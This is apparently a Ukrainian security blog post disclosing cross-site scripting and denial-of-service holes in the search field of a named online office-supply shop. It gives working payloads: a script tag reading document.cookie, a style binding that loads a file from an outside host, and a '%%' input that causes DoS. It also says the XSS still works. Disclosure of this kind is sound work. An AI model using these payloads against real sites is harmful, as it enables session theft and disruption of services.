Уразливості на www.officepro.com.ua
15:10 26.07.201008.12.2009
У квітні, 22.04.2009, я знайшов Cross-Site Scripting та Denial of Service уразливості на сайті http://www.officepro.com.ua. Про що найближчим часом сповіщу адміністрацію сайта.
Стосовно дірок на сайтах онлайн магазинів в останнє я писав про уразливості на viland.ua.
Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.
26.07.2010
XSS:
POST запит на сторінці www.officepro.com.ua/search_result.html
"><script>alert(document.cookie)</script>
В полі “Поиск товаров”.
Дана уразливість виправлена, але неякісно і при зміні коду, знову працює.
XSS:
POST запит на сторінці www.officepro.com.ua/search_result.html
" style="-moz-binding:url(http://websecurity.com.ua/webtools/xss.xml#xss)
В полі “Поиск товаров”.
XSS через GET:
DoS:
POST запит на сторінці www.officepro.com.ua/search_result.html
%%
В полі “Поиск товаров”.
DoS уразливість вже виправлена, але XSS все ще працює.
П'ятниця, 13:54 05.11.2010
спасибо
П'ятниця, 15:20 05.11.2010
Vasil
Всегда пожалуйста.